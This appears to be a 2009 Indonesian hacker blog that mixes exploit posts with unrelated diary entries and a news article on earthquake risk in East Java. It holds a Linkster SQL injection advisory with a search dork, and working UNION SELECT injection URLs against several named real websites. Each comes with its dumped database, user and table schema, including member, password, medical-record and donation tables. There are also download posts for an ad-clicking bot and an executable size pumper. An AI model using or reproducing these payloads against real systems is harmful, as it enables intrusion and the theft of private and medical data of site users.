o--::-::-::-@NG3L@-::-::-::--o: 2009

Linkster - a PHP/MySQL link indexing script SQL Injection Vulnerability

(o)===========================================================(o)

-:- Linkster - a PHP/MySQL link indexing script SQL Injection Vulnerability -:-

Vendor : http://gliebster.com
Author : Angela Zhang
Contact : mizz_4ng3l@yahoo.com
Date : 15 - December - 2009

(o)===========================================================(o)

Dork :

Powered by Linkster

Vulnerabilities :

http://localhost/path/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--

Demo :

http://www.stackpole.org.uk/linkster/linkster.php?CID=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--

(o)===========================================================(o)

Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , stardustmemory , str0ke

(o)===========================================================(o)

KlikDokter....

###############################################
by : angela zhang
contact : angel@ch4ng.cc

###############################################

(o) http://kehamilan.klikdokter.com/subpage.php?id=2&sub=6+AND+1=2+UNION+SELECT+1,2,version(),4,5,6,7--

(0) Checking MySQL Information ...

[+] Current Database : klikdokter2
[+] Database User : klikdokteradm@klikdokter.com
[+] MySQL Version : 5.0.45

(o) Checking MySQL Information ...

[+] Current Database : klikdokter2
[+] Database User : klikdokteradm@klikdokter.com
[+] MySQL Version : 5.0.45

(o) [+] DATABASES(15)

1) information_schema
2) SS_mysite
3) horde
4) iluni
5) klikdokter
6) klikdokter2
7) klikdokterdb
8) klikdokterorg
9) millis
10) mysql
11) newsletter
12) newslettermail
13) phpmyadmin_LwwBakylAaPG
14) psa
15) sitebuilder3

(o) [+] klikdokter2(165)
[1] aboutus(1): id,title,content.

[2] anak_details(33): id,id_menu,short_title,subcontents,contents,images,status.

[3] article_category(4): id,name,description,parent_id,comment.

[4] article_comment(926): id,article_id,fullname,email,comment,member_id,date_added,publish.

[5] article_detail(1135): id,article_id,title,front_content,content,mobile,date_added,enable,added_by,
main_topic,image_header.

[6] banner(23): id,sponsor_id,name,width,height,description,type_banner,file,link,position_id,
start_date,end_date,order_number,display.

[7] banner_position(5): id,position,max_banner.

[8] bni_blackberry(3): id,namalengkap,alamat,kodepos,kota,provinsi,telephone,hp,digit,masaberlaku,
status,sent,email,tgllahir,ccname,kodeproduk,jeniscicilan,alamatkirim,namapenerima.

[9] bni_perfecthealth(1): id,namalengkap,alamat,kodepos,kota,provinsi,telephone,hp,digit,masaberlaku,status,
sent,email,tgllahir,ccname,kodeproduk,jeniscicilan,alamatkirim,namapenerima.

[10] bniblackberry(1432): id,ipaddress,memberid,visitdate.

[11] bnibonuspasti(282): id,ipaddress,memberid,visitdate.

[12] bnidownloadpdf(101): id,ipaddress,memberid,visitdate,type.

[13] bnilebaran(341): id,ipaddress,memberid,visitdate.

[14] bnipromo(0): id,ipaddress,memberid,visitdate.

[15] bnipromolebaran(154): id,ipaddress,memberid,visitdate.

[16] bnismartsensation(251): id,ipaddress,memberid,visitdate.

[17] bulan(12): id,month.

[18] cantik_details(15): id,id_menu,short_title,subcontents,contents,images,status.

[19] cc(5): id,cctype,states.

[20] city(0): id,city_name,province_id.

[21] column_category(10): id,name,description,by,order,show_front,filename,images,subdomain.

[22] column_category_bak(1): id,name,description,by.

[23] column_consultation(95): id,category_id,question,answer,post_date,member_id,publish,nama,domisili,
email,umur,gender,usia,tinggibadan,beratbadan,title,updatepost.

[24] column_detail(62): id,category_id,title,front_content,content,date_added,publish,image_header.

[25] column_detail_bak(1): id,category_id,title,content,date_added,publish.

[26] consultation(5880): id,illness_category_id,title,question,answer,post_date,member_id,publish,
nama,domisili,email,umur,gender,usia,tinggibadan,beratbadan,updatepost,
vendor.

[27] diabetes_details(15): id,id_menu,short_title,subcontents,contents,images,status.

[28] doctor_event(237): id,name,date_begin,date_end,location,description,public,article.

[29] doctor_event_bak(9): id,name,date_begin,date_end,description.

[30] doctor_event_title(26): id,title,url,status.

[31] doctor_general_information(1): id,title,content,mobile,date_add,added_by.

[32] doctor_illness_category(1): id,name,description,parent_id.

[33] doctor_illness_detail(8): id,doctor_illness_category_id,name,description,mobile.

[34] doctor_information_category(0): id,category,description.

[35] doctor_information_detail(7): id,name,headline,description,file_name,file_data,image_header,date_added.

[36] doctor_job_opportunity(19): id,position,company,location,salary,detail,start_date,end_date,mobile,status.

[37] doctor_job_opportunity_bak(10): id,title,detail,mobile.

[38] doctor_knowledge_academic(0): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile,attachment_name1,attachment_file1,attachment_name2,
attachment_file2,attachment_name3,attachment_file3,attachment_name4,
attachment_file4,attachment_name5,attachment_file5.

[39] doctor_knowledge_category(24): id,name,parent_id,description.

[40] doctor_knowledge_info(1): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile.

[41] doctor_knowledge_interview(1): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile,attachment_name1,attachment_file1,attachment_name2,
attachment_file2,attachment_name3,attachment_file3,attachment_name4,
attachment_file4,attachment_name5,attachment_file5.

[42] doctor_knowledge_journal(144): id,doctor_knowledge_category_id,title,content,date_added,added_by,mobile,
attachment_name1,attachment_file1,attachment_name2,attachment_file2,
attachment_name3,attachment_file3,attachment_name4,attachment_file4,
attachment_name5,attachment_file5.

[43] doctor_knowledge_news(1): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile.

[44] doctor_knowledge_reference(22): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile,attachment_name1,attachment_file1,attachment_name2,
attachment_file2,attachment_name3,attachment_file3,attachment_name4,
attachment_file4,attachment_name5,attachment_file5.

[45] doctor_knowledge_research(4): id,doctor_knowledge_category_id,title,content,date_added,added_by,
mobile,attachment_name1,attachment_file1,attachment_name2,
attachment_file2,attachment_name3,attachment_file3,attachment_name4,
attachment_file4,attachment_name5,attachment_file5.

[46] doctor_member(7): id,member_id,specialization_id,NIM,Nomor_Pengenal,doctor_status.

[47] doctor_regulation_category(1): id,name,description,date_added,added_by,order.

[48] doctor_regulation_detail(4): id,category_id,name,description,file_name,file_data.

[49] doctor_schedule(2458): id,doctor_id,str,day,room,location,time_start,time_end,institute_id,
schedule_type,clinic_id.

[50] doctor_specialization(91): id,name,description,parent_id,order.

[51] doctor_specialization_bak(78): id,name,description,parent_id,order.

[52] doctor_type(5): id,name,description.

[53] event_interest(705): id,user_id,event_id.

[54] faculty(60): id,faculty_type_id,name,address,phone,fax,email,website,logo,ad_art,
vision_mission,history,staff,rules,information,education_system,
education_program,education_facility,registration,misc_information.

[55] faculty_article(13): id,faculty_id,title,front_content,content,mobile,date_added,enable,
added_by,main_topic,image_header.

[56] firstaid_category(1): id,name,description,parent_id.

[57] firstaid_detail(17): id,firstaid_category_id,name,content,mobile.

[58] flede_maintable(54): id,name,title,titlefield,idfield,topicfield,authorfield,priority,hidden,
cmfields,comments,description,readgroup,addgroup,editgroup,delgroup,
filefields,addtitles,parentfield,themefield,whereq,orderby,lastmodified.

[59] flede_syslog(37623): id,userid,d,action,ip,lastmodified,url.

[60] flede_users(6): id,name,password,realname,groups,lastlogin,lastmodified.

[61] forum_category(12): id,name,description.

[62] forum_reply(316): id,forum_topic_id,doctor_id,message,date_sent,publish.

[63] forum_topic(38): id,forum_category_id,name,date_create,create_by,date_update,display.

[64] gigi_details(25): id,id_menu,short_title,subcontents,contents,images,status.

[65] gizi_details(18): id,id_menu,short_title,subcontents,contents,images,status.

[66] h1n1_details(9): id,id_menu,short_title,subcontents,contents,images,status.

[67] illness_category(12): id,category,description,parent_id,trigger.

[68] illness_detail(208): id,illness_category_id,name,description,mobile.

[69] illness_detection_detail(1): id,illness_detection_id,illness_detail_id.

[70] illness_detection_group(6): id,name,description.

[71] important_phone_category(3): id,category,description,parent_id.

[72] important_phone_detail(16): id,name,phone,category_id.

[73] institute(4): id,name,description.

[74] institute_clinic(661): id,institute_id,title,description,content,date_added.

[75] institute_detail(2187): id,sponsor,institute_id,province_id,name,address,phone,image_logo,
image_header,image_building,description,email,website,custom_title_1,
custom_content_1,custom_title_2,custom_content_2,custom_title_3,
custom_content_3,custom_title_4,custom_content_4,custom_title_5,
custom_content_5,show_front,registered.

[76] institute_equipment(92): id,institute_id,title,description,content,date_added.

[77] institute_general(278): id,institute_id,title,description,content,date_added.

[78] institute_member(70): id,institute_id,username,password,gen_key,access_key.

[79] institute_other(121): id,institute_id,title,description,content,date_added.

[80] jantung_details(17): id,id_menu,short_title,subcontents,contents,images,status.

[81] kehamilan_details(39): id,id_menu,short_title,subcontents,contents,images,status.

[82] list_rumahsakit(10): id,title,url,images,self,status.

[83] log_accessmed(0): datelog,phoneid,specialization_id,medicineid.

[84] log_broadcast(0): id,title,message,status,type_message,pharmacy_id.

[85] log_medicine(2431): id,medicine_id,member_id,date,source.

[86] lukabakar(1): id,title,contents,images,status,insdt.

[87] lukabakar_comment(9): id,lukabakar_id,ipaddress,nama,email,url,comment,status,insdt,upddt.

[88] mailinglist_blacklist(0): rule.

[89] mailinglist_drafts(0): id,subject,message,texthtml,lastsaved.

[90] mailinglist_messages(0): id,subject,message,created,queued,count,format.

[91] mailinglist_queue(0): message_id,address,send_after.

[92] mailinglist_subscribers(1): address,userkey,confirmed,last_sub_req_date,bounce_count.

[93] medical_record(41): id,code,penyakit,status.

[94] medicalrecord(11310): idmember,goldarah,medicalrecord,q1,q2,q3,q4,q5,q6.

[95] medicine(198): id,medicine_id,pharmacy_id,medicine_category_id,public,name,
composition,indication,contra_indication,warning,side_effect,interaction,
dose_adult,dose_children,dose_baby,dose_global,manual_for_pregnancy,
mobile,date_insert,date_updated,publish,image_name,create_by.

[96] medicine_category(128): id,category,description,public,parent_id.

[97] medicine_category_bak(18): id,name,description,parent_id.

[98] medicine_package_type(26): id,type,description.

[99] medicine_price(119): id,medicine_id,price,description.

[100] medicine_testimonial(9): id,member_id,medicine_id,testimonial.

[101] medicine_to_doctor_illness(18): id,illness_id,medicine_id.

[102] medicine_to_illness(20): id,illness_id,medicine_id.

[103] medicine_to_package_type(66): id,medicine_id,medicine_package_type.

[104] medicine_type_bak(20): id,medicine_category_id,name,description.

[105] member(13801): id,username,mobile_number,password,randval,email,active,sex,display,
fullname,phone,fax,birthplace,birthdate,address,city,province_id,zipcode,
note,profesi_id,profesi_txt,profession,permission,phone_id,status,
tglexpired,member_type_id,image,str_no,specialization_id,nim_no,
university_id,doctor_title,day1,location1,time_start1,time_end1,day2,
location2,time_start2,time_end2,day3,location3,time_start3,time_end3,
personal_comment,profesi_medis,profesi_medis_txt,reg_no,medicalrecord,
passid,regdate.

[106] member_bak(26): id,mobile_number,password,randval,email,active,fullname,phone,fax,
birthdate,address,city,province_id,zipcode,note,permission,phone_id,status,
tglexpired,member_type_id,image,str_no,specialization_id,javaid.

[107] member_pregnancy(1236): id,mid,nmbayi,pdate,type,status.

[108] member_type(3): id,name,description,permission.

[109] member_type_bak(2): id,name,description,permission.

[110] mobile_fdload(16): merkid,scid,nama,furl.

[111] mobile_handset(3): merkid,nama.

[112] mobile_scrhp(145): merkid,type,scrsize.

[113] newsletter(27): id,title,periode,contents,status.

[114] operator(5): id,name,description.

[115] organization(53): id,organization_type_id,name,address,email,contact,logo,profile,vision_mission,
history,ad_art,staff,rules,information,website.

[116] organization_article(13): id,organization_id,title,front_content,content,mobile,date_added,enable,
added_by,main_topic,image_header.

[117] organization_type(3): id,name,description.

[118] osteoporosis_details(15): id,id_menu,short_title,subcontents,contents,images,status.

[119] pdki_count(1788): id,ipaddress,downloaddate.

[120] pharmacy(287): id,name,address,description,image_file,email,city,province_id,zip.

[121] pharmacy_member(15): id,pharmacy_id,username,password,gen_key,access_key.

[122] pharmacy_sms_data(0): id,message,datelog,status,pharmacy_id,province_id,specialization_id,
week,year.
[123] polling(52): id,publish,question,description,logo,color_scheme,publish_date,
unpublish_date,permission.

[124] polling_answer(102): id,polling_id,answer,cache_result.

[125] polling_answer_bak(8): id,polling_id,answer,cache_result.

[126] polling_bak(2): id,publish,question,description,logo,color_scheme,publish_date,
unpublish_date.

[127] polling_permission(0): polling_id,member_type_id.

[128] polling_permission_bak(0): polling_id,member_type_id.

[129] polling_result_table(757): id,polling_id,answer_id,member_id,comment,email,name.

[130] polling_result_table_bak(0): answer_id,member_id.

[131] polling_result_tablebak(43): answer_id,member_id.

[132] pregnancy(0): id,mid,type,datepregnancy,insdt,status.

[133] profesi_umum(5): id,profesi.

[134] profiletokoh(67): id,title,jabatan,quote,description,contents,images,status.

[135] program(2): id,program_name,file_name,version,description.

[136] province(33): id,name,description,parent_id.

[137] quisioner_dokter(983): id,email,nama,quisioner,insdt.

[138] ramadhan2009(30): id,tips_date,tips_title,tips_images,tips_content.

[139] rubrik_anak(6): id,title,status.

[140] rubrik_cantik(4): id,title,status.

[141] rubrik_diabetes(5): id,title,status.

[142] rubrik_download(7): id,rubrik_category,filename,status,type.

[143] rubrik_download_count(6): id,ipaddress,fileid,count.

[144] rubrik_gigi(5): id,title,status.

[145] rubrik_gizi(5): id,title,status.

[146] rubrik_h1n1(2): id,title,status.

[147] rubrik_jantung(4): id,title,status.

[148] rubrik_kehamilan(5): id,title,status.

[149] rubrik_osteoporosis(4): id,title,status.

[150] rubrik_seks(4): id,title,status.

[151] seks_details(28): id,id_menu,short_title,subcontents,contents,images,status.

[152] sponsor(3): id,name,detail.

[153] static_page(70): id,title,description,content,url.

[154] str(90437): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id,regdate.

[155] str_bak(1495): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id.

[156] str_bak2(18955): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id.

[157] str_bak3(18955): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id.

[158] str_bak4(18955): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id.

[159] str_copy(1495): NoUrut1,NoUrut2,Nama,NoRegis,Tempat_lahir,Tanggal_lahir,Kelamin,
Spesialisasi,Sub_Spesialisasi,Universitas,Tgl_LLS,Kab_Kota,Tgl_Berlaku,
Province_ID,specialization_id.

[160] survey(28306): id,ipaddress,insdt,type.

[161] testimonial(12): id,category_id,nama,email,testimonial,publish,profesi,umur,domisili.

[162] university(49): id,name,address,location,province_id.

[163] university_student(1396): id,university_id,NIM,fullname,year_class.

[164] vendor(1): id,code,vendor,status.

[165] widget_pregnancy(40): id,week,subtitle,title,content,small_image,big_image,insdt,upddt,status.

Finish.

###############################################
Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , mywisdom , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

###############################################

My loVeLy Terios

duh... bingung mau ngapaen, corat coret aja di blog ku... namanya aja juga blog asal2 an.. xixiixix.

sebenernya antara terios sama new honda jazz itu bagus mana yaks...
awalnya pengen jazz, tp gara2 indent nya lama , akhirnya beli terios...

semoga aja gk salah pilih.....

tapi keren kok, apalagi angel yg bawa.. xixixiix.. sangar. Narsis.set.mode.ON
xixiixxix .... dah ah...

Bete bete bete bete bete bete

jawapos surabaya... ehm.....

http://www.jawapos.co.id/radar/index.php?act=detail&rid=-30534'+union+select+1,2,3,version(),5,6,7,8,9,10/*

[+] db_jawapos_utama(15) :
[1] adgroup(84) : id,nama,kategori,sirkulasi,area,audience,alamat1,kota1,telfax1,email1,
website,gm,admanajer,kontakperson,iklan,kantorpusat,alamat2,kota2,
telfax2,email2,perwakilan,alamat3,kota3,telfax3,email3,kode,note,
tgl_update,
[2] counter_rubrik(3266798) : tgl_akses,news_id,subkat_id,kat_id,
[3] data_adv(0) : ADV_ID,ADV_DATE,ADV_NAME,ADV_DESC,ADV_IMG,ADV_NUMBER,
ADV_URL,ADV_EXPIRE,ADV_KATEG_PAGE,
[4] data_clekit(256) : CLEKIT_ID,CLEKIT_DATE,
[5] data_headlines(3894) : HL_ID,NEWS_ID,NEWS_DATE,
[6] data_iklan(8) : ID_IKLAN,TGL_UPLOAD,JENIS_IKLAN,KETERANGAN_JENIS_IKLAN,
FILE_IKLAN,IKLAN_DESC,STATUS,LAST_UPDATE,KETERANGAN,
[7] data_jpnn(145) : id_jpnn,nama,kategori,area_edar,alamat1,alamat2,kota1,kota2,telpfax1,
telpfax2,website,email1,email2,
[8] data_news(83340) : NEWS_ID,NEWS_DATE,KATEG_ID,SUBKATEG_ID,NEWS_TITLE,
NEWS_SUBTITLE,NEWS_CONTENT,NEWS_SMALL_IMG,
NEWS_LARGE_IMG,NEWS_STATUS,NEWS_PAGE,SET_TAB,TAB_IMG,
TAB_CONTENT,
[9] data_pecut(552) : PECUT_ID,PECUT_DATE,PECUT_TEXT,
[10] data_radar(109277) : RADAR_ID,RADAR_DATE,RADAR_KATEG_ID,RADAR_TITLE,
RADAR_SUBTITLE,RADAR_CONTENT,RADAR_SMALL_IMG,
RADAR_LARGE_IMG,RADAR_STATUS,RADAR_PAGE,
[11] data_tabulasi(0) : TAB_ID,TAB_DATE,KATEG_ID,SUB_KATEG1,SUB_KATEG2,
TAB_CONTENT1,TAB_CONTENT2,TAB_IMG1,TAB_IMG2,
[12] jadwal_imsakiyah2009(29) : IM_ID,IM_DATE,IM_DATE_ISLAM,IM_IMSAK,IM_SHUBUH,
IM_DZUHUR,IM_ASHAR,IM_MAGHRIB,IM_ISYA,
[13] kategori(17) : KATEG_ID,KATEG_NAME,KATEG_STATUS,
[14] radar_kategori(15) : RADAR_KATEG_ID,RADAR_KATEG_NAME,
[15] sub_kategori(53) : SUBKATEG_ID,SUBKATEG_NAME,KATEG_ID,SUBKATEG_STATUS,

Donation Worlpay

http://www.edgeofexistence.org/mammals/species_info.php?id=50+AND+1=2+UNION+SELECT+1,2,3,4,5,
version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
[+] edgeofex_piaget(49)
[1] COPYRIGHT(165): Copyright_ID,Copyright_Name,Organisation,Email,Website.
[2] DONATIONS(158): Donation_ID,Timestamp,Donation_type,Title,First_name,Surname,
Email_address,Giftaid,Receive_updates,Reason_for_visit,Use_name.
[3] ECARDS(248): Ecard_ID,Timestamp,Card_type,Card_instance,Sender_name,
Sender_email,Recipient_name,Recipient_email,Receive_updates,
Personal_message.
[4] MEMBER(71): Member_ID,Status,Title,Firstname,Surname,Middlenames,Suffix,Gender,
Summary,Locations,Organisation.
[5] MEMBER_IMAGE(134): Member_ID,Image_Type,Image,Copyright_ID.
[6] MEMBER_MEMBER_TYPE(96): Member_ID,Member_Type_ID.
[7] MEMBER_POST(76): Member_ID,Post_Table,Post_ID.
[8] MEMBER_SPECIES(98): Member_ID,Species_ID,Relevance_Description.
[9] MEMBER_TEXT(304): Member_ID,Text_Type,Text.
[10] MEMBER_TYPE(8): Member_Type_ID,Member_Type,Priority,Member_Type_Description.
[11] POLYGON(783): Polygon_ID,Species_ID.
[12] POLYGON_POINTS(41098): Polygon_ID,Boundary,Point_number,Phi,Delta.
[13] PROJECT(72): Project_ID,Project_Type_ID,Project_Name,Project_Description,
Project_Locations.
[14] PROJECT_IMAGE(212): Project_ID,Image_Type,Image,Title,Caption,Copyright_ID.
[15] PROJECT_MEMBER(100): Project_ID,Member_ID,Member_Role,Member_Role_Description.
[16] PROJECT_POST(80): Project_ID,Post_Table,Post_ID.
[17] PROJECT_TEXT(426): Project_ID,Text_Type,Text.
[18] PROJECT_TYPE(7): Project_Type_ID,Project_Type,Project_Type_Description.
[19] SPECIES(1369): Species_ID,EDGE_Group,Type,EDGE_rank,Species_class,Species_order,
Species_family,Scientific_name,Synonym,Common_name,ED_score,
GE_score,EDGE_score,Short_summary,Summary,Other_names,
Edgeometer,Possibly_extinct,Focus_species,Search_countries,Generate_countries,
Aquatic_regions.
[20] SPECIES_IMAGE(865): Species_ID,Type,Image,Title,Caption,Copyright,Copyright_Link,Copyright_ID.
[21] SPECIES_POST(101): Species_ID,Post_Table,Post_ID.
[22] SPECIES_PROJECT(102): Species_ID,Project_ID,Relevance_Description.
[23] SPECIES_TEXT(5238): Species_ID,Text_Type,Text.
[24] ap_column_preferences(1): acp_id,form_id,element_name,position.
[25] ap_element_options(12): aeo_id,form_id,element_id,option_id,position,option,option_is_default,
live.
[26] ap_form_1(101): id,date_created,date_updated,ip_address,element_1_1,element_1_2,
element_2,element_3,element_4,element_5.
[27] ap_form_2(4): id,date_created,date_updated,ip_address,element_1,element_2,
element_3,element_4,element_5,element_6_1,element_6_2,element_6_3,
element_6_4,element_6_5,element_6_6,element_8_1,element_8_2,
element_9,element_10,element_11.
[28] ap_form_elements(15): form_id,element_id,element_title,element_guidelines,element_size,
element_is_required,element_is_unique,element_is_private,element_type,
element_position,element_default_value,element_constraint,element_total_child.
[29] ap_forms(2): form_id,form_name,form_description,form_redirect,
form_success_message,form_email,form_password,form_unique_ip,
form_frame_height,form_has_css,form_captcha,form_active,
form_review,esl_from_name,esl_from_email_address,esl_subject,
esl_content,esl_plain_text,esr_email_address,esr_from_name,
esr_from_email_address,esr_subject,esr_content,esr_plain_text.
[30] bb_forums(2): forum_id,forum_name,forum_slug,forum_desc,forum_parent,forum_order,topics,posts.
[31] bb_posts(522): post_id,forum_id,topic_id,poster_id,post_text,post_time,poster_ip,post_status,post_position.
[32] bb_tagged(11): tagged_id,tag_id,user_id,topic_id,tagged_on.
[33] bb_tags(11): tag_id,tag,raw_tag,tag_count.
[34] bb_topicmeta(63): meta_id,topic_id,meta_key,meta_value.
[35] bb_topics(105): topic_id,topic_title,topic_slug,topic_poster,topic_poster_name,
topic_last_poster,topic_last_poster_name,topic_start_time,
topic_time,forum_id,topic_status,topic_open,topic_last_post_id,
topic_sticky,topic_posts,tag_count.
[36] copyampspecies(140): A,NAME,EMAIL,ORGANISATION,WEBSITE,SPECIES,THUMB NAIL PICTURE,MAIN PICTURE,EXTRA PICTURE,Notes,PROOFS.
[37] wp_edgeblogcomments(1017): comment_ID,comment_post_ID,comment_author,
comment_author_email,comment_author_url,comment_author_IP,
comment_date,comment_date_gmt,comment_content,comment_karma,
comment_approved,comment_agent,comment_type,comment_parent,user_id.
[38] wp_edgebloglinks(10): link_id,link_url,link_name,link_image,link_target,link_category,
link_description,link_visible,link_owner,link_rating,link_updated,
link_rel,link_notes,link_rss.
[39] wp_edgeblogoptions(138): option_id,blog_id,option_name,option_value,autoload.
[40] wp_edgeblogpollsa(5): polla_aid,polla_qid,polla_answers,polla_votes.
[41] wp_edgeblogpollsip(1): pollip_id,pollip_qid,pollip_aid,pollip_ip,pollip_host,
pollip_timestamp,pollip_user,pollip_userid.
[42] wp_edgeblogpollsq(1): pollq_id,pollq_question,pollq_timestamp,pollq_totalvotes,
pollq_active,pollq_expiry.
[43] wp_edgeblogpostmeta(1302): meta_id,post_id,meta_key,meta_value.
[44] wp_edgeblogposts(772): ID,post_author,post_date,post_date_gmt,post_content,
post_title,post_category,post_excerpt,post_status,
comment_status,ping_status,post_password,post_name,
to_ping,pinged,post_modified,post_modified_gmt,
post_content_filtered,post_parent,guid,menu_order,post_type,
post_mime_type,comment_count.
[45] wp_edgeblogterm_relationships(1137): object_id,term_taxonomy_id,term_order.
[46] wp_edgeblogterm_taxonomy(28): term_taxonomy_id,term_id,taxonomy,description,parent,count.
[47] wp_edgeblogterms(28): term_id,name,slug,term_group.
[48] wp_edgeblogusermeta(26886): umeta_id,user_id,meta_key,meta_value.
[49] wp_edgeblogusers(9116): ID,user_login,user_pass,user_nicename,user_email,user_url,
user_registered,user_activation_key,user_status,display_name.

c0li by angela

UU9 Clicker ( powered by www.uu9.eu )

Found this while browsing on the internet, all credits go to pp_l0ve, maker of this software.
If you never heard about UU9, it's an advertisment system, which will pay you for every ad impression.

Quote:

An automation program for the website uu9.eu.
- Proxy support
- Requires .NET framework 2.0 (or higher)
- Supports background running

Code:

File UU9_Auto.exe received on 2009.10.20 10:29:45 (UTC)
Current status: finished
Result: 0/41 (0.00%)

Download Link here!.

ExE Pumper

Download Link here!.

1. Simply load the desired file select which size you want to increase by and insert your number

2. Select output directory and name new file.

3. Press "Pump It"
[Note] For large filesizes Gigabytes for example, the program may hang be patient it will complete and you will be given a message box declaring "Done!"

Jawa Timur Siaga Gempa 8,8 Skala Richter

Jawa Timur bagian selatan rentan menghadapi tsunami.

VIVAnews – Gubernur Jawa Timur Soekarwo minta pada seluruh kabupaten/kota di Jatim melakukan siaga bencana melalui early warning system atau sistem peringatan dini. Sebab menurut peneliti dari Lembaga Ilmu Pengetahuan Indonesia (LIPI), Jawa Timur bagian selatan memiliki potensi gempa karena berada dalam patahan Samudera Indonesia.

“Saya minta seluruh kabupaten/kota di Jatim, khususnya di wilayah selatan agar melakukan antisipasi gempa melalui sistem peringatan dini. Antisipasi itu bisa dilakukan dengan menyiapkan masyarakat melakukan langkah-langkah darurat jika terjadi gempa,” kata Soekarwo Senin 5 Oktober 2009.

Terkait itu, dibeberapa daerah di Jatim sudah melakukan itu. Misalnya di Lumajang, khususnya daerah pesisir selatan Jatim.

Sistem peringatan dini tidak harus berupa alat yang canggih. “Masyarakat bisa dilatih menggunakan kentongan sebagai sistem peringatan dini. Agar mereka mengetahui kalau ada bahaya gempa dan harus segera mengungsi."

Lebih jauh dikatakan, pesisir selatan Jatim dan Bali masuk dalam zona bahaya gempa yang berpotensi tsunami. Sebab di wilayah selatan Jatim terdapat patahan panjang mulai dari Sumatera.

Bahkan salah satu pakar geologi dari LIPI, Danny Hilman Natawidjaja, mengatakan bahwa terjadinya gempa di Aceh dan Sumatera Utara pada 26 Desember 2004, gempa Jogyakarta pada 27 Mei 2006 dan Gempa Padang yang terjadi pada 30 Septenber 2009 kemarin, memicu patahan di Samudera Indonesia.

Adanya patahan itu diperkirakan bakal terjadi gempa dahsyat berkekuatan lebih dari 8 Skala Richter yang yang berpusat di Segmen Mentawai dan berpotensi Tsunami.

Prediksi itu beralasan, dari penelitian Prof Kerry Sieh dari Nanyang Technology University (NTU) Singapura, memiliki catatan gempa dan patahan yang terjadi di selatan Jawa selama 12 tahun. Jika tekanan terhadap patahan semakin tinggi, bisa jadi memicu gempa yang mencapai 8,8 SR.

c0li y0k

http://www.musiquemachine.com/reviews/reviews_template.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,%20version%28%29,10,11,12,13,14,15,16,17 --

[+] mm_db(8)
[1] albumofthemonth(96): am_id,am_reviewid,am_month,am_year.
[2] articles(133): a_id,a_bandname,a_articlename,a_date,a_time,a_introtext,a_moretext,
a_author,a_bandpicid1,a_bandpicid2,a_bandpicid3,a_bandpicid4,a_bandpicid5.
[3] authors(25): author_id,author_name,author_password,author_level,author_email,
author_description,author_bestlastyear,author_playlist,author_comments,author_inactive.
[4] bands(6): b_id,b_bandname,b_date,b_time,b_discography,b_biography,b_author,b_bandpicid,
b_firstname,b_relatednames.
[5] binary_data(5368): id,description,bin_data,filename,filesize,filetype.
[6] mp3(28): m_id,m_bandname,m_songtitle,m_albumname,m_date,m_time,m_intro
text,m_moretext,m_author,m_mp3,m_bandpic.
[7] reviews(2276): r_id,r_new,r_bandname,r_albumtitle,r_release,r_label,r_date,r_time,r_introtext,
r_moretext,r_author,r_score,r_bandpicid,r_albumpicid,r_proxisid,r_homepage,r_firstname.
[8] weblog(772): w_id,w_title,w_text,w_date,w_time,w_author.

gk tau mau post apa. gk dpt sql yg bgs akhir2 ini.... males c0li jadinya... :(

Welcome To The New House

Semoga dirumah baru semakin diberkati , semakin sukses , semakin bahagia....

Damai ,sejahterah.... dan semua deh... iixixixixi Doain ya teman2....

Amen...!!!

Semuanya Semu.....!!!

Gk tau harus ngomong sm siapa, karena gw bukan type orang yg suka mencurahkan kesedihan ato mslh kepada orang lain , sekalipun teman dekat. Ehm...ngomel di blog ku aja deh... hikz...

....................................

...............................................................

ah... tau ah mau ketik apa...............

kira2 udah seminggu hatiku gk enak, ada aja masalah yg bikin aku kepikiran, klo udah gt pasti gk selesei2 mikirnya, mesti kebawa merasa bersalah , trs nyesel , terus gundah , ya pokoknya nge ganjal banget dihati.

hikz... Tuhan kapan hal ini akan berlalu menjadi kegembiraan dan kelegaan buat hatiku. Ya.. aku tidak tau harus bagaimana menghadapinya... jangan bikin aku lemah Tuhan...

Hanya berharap untuk kuat dan tegar menjalani semuanya, meskipun berata sekali rasanya... hati kecilku menangis, sedih , sedih sekali. sangat berat rasanya untuk bertahan. tapi ini adalah kehidupan.....

Entah sampai kapan akan seperti ini, dimana kebahagiaan ku , dimana keceriaan ku , dimana ketenanganku , dan dimana kedamaianku. selama ini aku terus hanya bisa menerima dg semuanya. tapi kenapa semakin mengalah malah semakin menderita.
ingin sekali merasakan kebahagiaan yg sesungguhnya, kebahagiaan yg tulus dr dalam hatiku. karena selama ini aku hanya merasa klo kebahagiaan yg kudapat adalah semu.

dalam seminggu ini yg bikin aku ingat akan semua kesedihan , penderitaan , masalah , yg kuhadapi selama umur hidupku....
Ah.... Ternyata Tiada ada kebahagian Yg benar2 Tulus kurasakan Selama ini....

